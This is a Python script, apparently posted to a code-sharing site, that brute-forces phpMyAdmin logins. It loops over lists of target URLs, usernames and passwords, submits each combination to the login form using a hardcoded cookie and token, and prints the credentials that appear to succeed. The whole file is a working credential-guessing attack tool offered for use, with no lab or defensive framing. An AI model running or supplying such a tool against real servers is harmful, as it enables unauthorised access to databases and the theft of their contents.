1 #!usr/bin/env python 2 #encoding: utf-8 3 #by i3ekr 4 5 import requests 6 7 8 9 headers = {'Content-Type':'application/x-www-form-urlencoded', 10 'User-Agent':'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36', 11 'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8', 12 'Cookie':'pmaCookieVer=5; pma_lang=zh_CN; pma_collation_connection=utf8mb4_unicode_ci; phpMyAdmin=vo6nt8q71hsv93fb9a7c5b5oot2215gq' 13 } 14 def attack(host,username,password): 15 host = host + "/index.php" 16 payload ={'pma_username':username, 17 'pma_password':password, 18 'server':'1', 19 'target':'index.php', 20 'token':'bf8e4192569617d39070c5739cd1776f'} 21 try: 22 html = requests.post(host,headers=headers,data=payload).text 23 if "themes/pmahomme/img/logo_right.png" in html: 24 print "[-] %s-%s"%(username,password) 25 else: 26 print "[+] %s-%s-%s"%(host,username,password) 27 except Exception as e: 28 pass 29 30 with open('./url.txt','r') as url: 31 host_t = url.readlines() 32 with open('./username.txt','r') as username: 33 username_t = username.readlines() 34 with open('./password.txt','r') as password: 35 password_t = password.readlines() 36 for h in host_t: 37 host = h.strip() 38 for u in username_t: 39 username = u.strip() 40 for p in password_t: 41 password = p.strip() 42 attack(host,username,password)